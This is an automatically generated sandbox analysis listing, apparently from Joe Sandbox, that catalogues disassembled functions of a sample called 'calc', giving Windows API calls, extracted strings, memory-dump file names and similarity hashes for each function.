LCMapStringA.KERNEL32(?,00000100,?,?,?,00000000,?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450DBA
_strncpy.LIBCMT ref: 00450DDF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast_strncpy
String ID:
API String ID: 4089183155-0
Opcode ID: 7494c18793ddb7cd16056d16721e8203c2a1c51e91505f3a58669b8d99ecc347
Instruction ID: 87915a71c5da1ed2875a20551b42c726cebfd4ef946e7aa7ce96f893867ce171
Opcode Fuzzy Hash: 7494c18793ddb7cd16056d16721e8203c2a1c51e91505f3a58669b8d99ecc347
Instruction Fuzzy Hash: BF71B17580020AEFCF119FA4CC859EF7BB5FF09316F24462AF921A2262C7388D55DB59

Function 0043CB9B Relevance: 13.6, APIs: 9, Instructions: 70fileCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(000000FF,000000FF,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CBAB
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CBC2
ReadFile.KERNEL32(000000FF,000000FF,?,?,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A), ref: 0043CBDC
GetLastError.KERNEL32(?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?,00000000,00000000), ref: 0043CBE6
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CBF5
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CC01
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CC0D
SetLastError.KERNEL32(00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?,00000000,00000000), ref: 0043CC18
SetLastError.KERNEL32(00000006,000000FF,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CC25

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: File$Pointer$ErrorLast$ReadType
String ID:
API String ID: 74101062-0
Opcode ID: a69c8df32c0e20c753d7404060deeb2171b2dec1cf91e1f050b34e5e6fe33c2c
Instruction ID: ecafed72938480ac762a22eb363c2c95b40075f44803c8607e6e5373edb57986
Opcode Fuzzy Hash: a69c8df32c0e20c753d7404060deeb2171b2dec1cf91e1f050b34e5e6fe33c2c
Instruction Fuzzy Hash: 64115872900209FFEB019FA09DC8C7F7B7DEB48395F106466F505A2250C7349D11DBA5

Function 00401DB3 Relevance: 13.6, APIs: 9, Instructions: 64sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(00000025,00000000), ref: 00401DD7
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00401DF5
Sleep.KERNEL32(00000000,?,0043FF5E,00000001,TABRIGHT,TABLEFT,ISENABLED,ISVISIBLE), ref: 00401DF8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00401E01
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00401E39
Sleep.KERNEL32(00000000,?,0043FF5E,00000001,TABRIGHT,TABLEFT,ISENABLED,ISVISIBLE), ref: 00401E3C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessagePostSleepVirtual
String ID:
API String ID: 660143448-0
Opcode ID: c5f8dfd490d2f8feaa47010e345f7e16d08157c92134579223c2cf7de968ed32
Instruction ID: 314088039eba6aec791dc48b178ba8ec29ead1ba01d9ff949e3fc8231b8fac0c
Opcode Fuzzy Hash: c5f8dfd490d2f8feaa47010e345f7e16d08157c92134579223c2cf7de968ed32
Instruction Fuzzy Hash: C8019631140608BFF6216F51CC49FAB7A5DDF45786F110829F790A50E2C9FAAC91997C

Function 00411A14 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 343COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00411A34
_strlen.LIBCMT ref: 00411A46
VkKeyScanA.USER32(00000000), ref: 00411AE3
VkKeyScanA.USER32(00000000), ref: 00411B96

Part of subcall function 00410DF3: VkKeyScanA.USER32(?), ref: 00410DFB

Strings

0%d, xrefs: 00411B59
off, xrefs: 00411B21
down, xrefs: 00411AF3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Scan$_strlen
String ID: 0%d$down$off
API String ID: 1220333230-2112978555
Opcode ID: 4ef5677da4f412f11d5513374e1eeaf6012140df0c25a9a5df50ec0de7af25da
Instruction ID: e69c97ce56cf479a7f09eb9e4295095d95da97d2fa2f27f976221b7850857607
Opcode Fuzzy Hash: 4ef5677da4f412f11d5513374e1eeaf6012140df0c25a9a5df50ec0de7af25da
Instruction Fuzzy Hash: 11C14930A44245AEEF20CF55C845FEB7B74DF41308F24405BEA419B2A2E67C9DC6C799

Function 0040FFA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 177COMMON

Download Yara Rule

Strings

Error opening the file, xrefs: 0041000D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0040FFC5
Unterminated string, xrefs: 004101AD

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: HandleLoadModuleString
String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string
API String ID: 3590730445-3232779785
Opcode ID: f883dc1264e64bc73bfa17d63d9b0fdb745af918d1e7d9c0c24b9034dd7eab45
Instruction ID: 77393d9a191bb7f7478c373efea1c4ed925f04e9ca4268ec523b6ef09f5006fe
Opcode Fuzzy Hash: f883dc1264e64bc73bfa17d63d9b0fdb745af918d1e7d9c0c24b9034dd7eab45
Instruction Fuzzy Hash: 95616F7280421DBEEF21DBA0CC45FDE7B78AF05308F0440ABF905A2152DB7D9AC98B59

Function 00414C46 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 171COMMON

Download Yara Rule

APIs

74AB1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?,?,?), ref: 00414CDA

Strings

04090000, xrefs: 00414D0B
%u.%u.%u.%u, xrefs: 00414DB3
StringFileInfo\, xrefs: 00414CB1
\VarFileInfo\Translation, xrefs: 00414CD2
DefaultLangCodepage, xrefs: 00414D34

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: B1560
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 568583506-1459072770
Opcode ID: 86428efb9b3e8ac43dcb9c24adbf7a51f161da3ec63f6392ab646084e21f9d3d
Instruction ID: b540cfc319d4a38a51c032714b70e1d9c6a701d3d0a690d825f71a9fdec0b216
Opcode Fuzzy Hash: 86428efb9b3e8ac43dcb9c24adbf7a51f161da3ec63f6392ab646084e21f9d3d
Instruction Fuzzy Hash: 6E41D571900205BAFF25BB619C82DFF776CEF41728B10006FFC05A6182EB3D9E05A669

Function 004133AD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 123windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,0000002C), ref: 00413437
IsMenu.USER32(00000000), ref: 0041344D
CreatePopupMenu.USER32 ref: 00413489
GetMenuItemCount.USER32(?), ref: 004134E2
InsertMenuItemW.USER32(00000000,000000F5,00000001,0000002C), ref: 00413509

Strings

2, xrefs: 00413474
,, xrefs: 004133D9

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: ,$2
API String ID: 93392585-4146714288
Opcode ID: 96b5094224ff491608ca524e3ef8238d77196a8e218a0bed69d208cc94b3b17b
Instruction ID: a783e2e86e23b152b86a37afb85d67028e09b8e793856ccb80c6acdd71082a21
Opcode Fuzzy Hash: 96b5094224ff491608ca524e3ef8238d77196a8e218a0bed69d208cc94b3b17b
Instruction Fuzzy Hash: DF41A370900209DBDF21CF68C8847EEBBF5AF4471AF18856AE855A7391D3789A80CB59

Function 0041FCD4 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 116windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0041FD29
LoadStringW.USER32(?,?,00000FFF), ref: 0041FD3C
MessageBoxW.USER32(?,?,00011010), ref: 0041FE42

Strings

Line %d (File "%s"):, xrefs: 0041FD94
Line %d:, xrefs: 0041FD80
Error: , xrefs: 0041FDB7
%s (%d) : ==> %s: %s %s, xrefs: 0041FE1A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: LoadString$Message
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:
API String ID: 2278601591-4162891365
Opcode ID: bf556b6b28b6e5c7f2e0e05ef1a1792f4beb60635d7a19190b26143e58addd44
Instruction ID: ee04281732928d5b98adbc9f49825bd154e7ff119a3da136eabcaa7874e413dc
Opcode Fuzzy Hash: bf556b6b28b6e5c7f2e0e05ef1a1792f4beb60635d7a19190b26143e58addd44
Instruction Fuzzy Hash: 0841C872D00218AADF21ABA5CC45FDE77ACAF05308F0040B7F908E6152E67D9E89DB5D

Function 004159F1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00415A09
gethostname.WS2_32(?,00000100), ref: 00415A22
gethostbyname.WS2_32(?), ref: 00415A2E
inet_ntoa.WS2_32(?), ref: 00415A75
_strcat.LIBCMT ref: 00415A82
WSACleanup.WS2_32 ref: 00415AAA

Strings

0.0.0.0, xrefs: 00415A4F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 1fe1fc4897be211978021beebcb1c8ce92a4e8963263964988dd7897a44ed26f
Instruction ID: d3789d6f31b40d2e731d2683e6b01f7d561f7210baffac271eff7e217f67039d
Opcode Fuzzy Hash: 1fe1fc4897be211978021beebcb1c8ce92a4e8963263964988dd7897a44ed26f
Instruction Fuzzy Hash: 3711E971940118BBFF11BA75CC86EDA33AC9F40368F1401A7B905A6182EA7C9FC59A9D

Function 00412B78 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 68windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00412BC0

Strings

stop, xrefs: 00412BE0
warning, xrefs: 00412BF8
blank, xrefs: 00412B8D
question, xrefs: 00412BC8
info, xrefs: 00412BA9

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 1dab5a4c37849c9e9609932a94803abe9922b88540791e85f48b547d4dd9970f
Instruction ID: 03b6517efc2aea6fd5e6d95e9b9689b5489a5d42b1b8a25ecbfe9ccecd26a511
Opcode Fuzzy Hash: 1dab5a4c37849c9e9609932a94803abe9922b88540791e85f48b547d4dd9970f
Instruction Fuzzy Hash: 4C11C63164C305BAFA165E519E02DEF63A8DF1472DB20005BFD02E11C2FAEDBA91519D

Function 00455946 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,0045C3C8,00000044,00453D57,?,00000000,?,?,00000000,00000000,0045C138,0000001C,0044EC56,00000001,?), ref: 0045598F
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00455939,?), ref: 004559A6
_strlen.LIBCMT ref: 004559CA
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,?,?,?,?,00000001,00000000,00455939), ref: 004559EB

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Info$ByteCharMultiWide_strlen
String ID:
API String ID: 1335377746-0
Opcode ID: 2531ae2dfe72b6e70166bd670b64fa0dc21bbb33c9211dd4f6f74d98a85caefc
Instruction ID: 790e399b39677daab9e77fb99c5e02dc5982c928aa711800bb143dd447e7e016
Opcode Fuzzy Hash: 2531ae2dfe72b6e70166bd670b64fa0dc21bbb33c9211dd4f6f74d98a85caefc
Instruction Fuzzy Hash: CC519E70901A18EFDF20DF95DCD89AFBBB9EF45322F20421AF815A6292D7385C45CB58

Function 0043C20B Relevance: 12.2, APIs: 8, Instructions: 171registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,00000000,00000000), ref: 0043C2B4
RegOpenKeyExW.ADVAPI32(00000000,?,00000000,?,00000000), ref: 0043C2F2
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0043C31D
RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 0043C355
RegCloseKey.ADVAPI32(00000000), ref: 0043C37E
RegCloseKey.ADVAPI32(00000000,00000002,00000000), ref: 0043C3C4

Part of subcall function 0043C147: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 0043C178

RegCloseKey.ADVAPI32(00000000), ref: 0043C390
RegDeleteKeyW.ADVAPI32(00000000,?), ref: 0043C39A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Close$Delete$ConnectEnumOpenRegistryValue
String ID:
API String ID: 4081530528-0
Opcode ID: fda0f22d2eda36e186a15a606b6a87005c4d9a9ed66a4535723ec2fc8b9d9f5a
Instruction ID: e232bde8f73a62d7fa102d6d414556a0cb7fee49fb5508a77672693c226a2e41
Opcode Fuzzy Hash: fda0f22d2eda36e186a15a606b6a87005c4d9a9ed66a4535723ec2fc8b9d9f5a
Instruction Fuzzy Hash: F9516F32900118EBCF10EFA5DC85AEE7774AF08314F14805AF805BB191DB39EE45DBA8

Function 004115E2 Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00411608
GetKeyboardState.USER32(?), ref: 0041161D
PostMessageW.USER32(?,00000101,00000012,?), ref: 0041167B
PostMessageW.USER32(?,00000101,00000011,?), ref: 004116A1
PostMessageW.USER32(?,00000101,00000010,?), ref: 004116C7
PostMessageW.USER32(?,00000101,00000010,?), ref: 004116ED
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00411713
SetKeyboardState.USER32(?), ref: 0041175D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: aa6c97a283ce8bd674bd44b473ae256e80a0dc0e0aab8d9900478a21e71fb197
Instruction ID: 9d733bec55df1b0aa4eacf9c07561fd85a6c8c2a14a1c19906ee9494bf923349
Opcode Fuzzy Hash: aa6c97a283ce8bd674bd44b473ae256e80a0dc0e0aab8d9900478a21e71fb197
Instruction Fuzzy Hash: 8E51E8305147986AEB318B78CC45BEF7FE49F45340F08445AFAE8CA292C6B9D9C1DB58

Function 004113CC Relevance: 12.2, APIs: 8, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004113F4
GetKeyboardState.USER32(?,?,00000000), ref: 00411409
SetKeyboardState.USER32(?,?,00000000), ref: 00411467
PostMessageW.USER32(?,00000100,0000005B,?), ref: 00411493
PostMessageW.USER32(?,00000100,00000010,?), ref: 004114B2
PostMessageW.USER32(?,00000100,00000010,?), ref: 004114D1
PostMessageW.USER32(?,00000100,00000011,?), ref: 004114F0
PostMessageW.USER32(?,00000100,00000012,?), ref: 00411524

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e78c36a590626a1166a9156384a0d936dda4f0eeaa9d608877eeb85747e89315
Instruction ID: 0f22143f38cef481d98d1135c44dc31a521d86ced055d74272154e822a439295
Opcode Fuzzy Hash: e78c36a590626a1166a9156384a0d936dda4f0eeaa9d608877eeb85747e89315
Instruction Fuzzy Hash: 0D51397050035CBDEB224B788C84BFF7BB5EB40744F04046EE699961A2C6B89EC1DB28

Function 00406535 Relevance: 12.1, APIs: 8, Instructions: 116COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 00406559
GetSysColor.USER32(00000005), ref: 004065D7
GetSysColor.USER32(00000005), ref: 004065FB
GetPixel.GDI32(00000000,00000000,00000000), ref: 0040661D
SetTextColor.GDI32(?,?), ref: 0040663C
SetBkMode.GDI32(00000000,00000001), ref: 0040664F
GetStockObject.GDI32(00000005), ref: 00406657
SetBkColor.GDI32(?,00000000), ref: 00406664

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
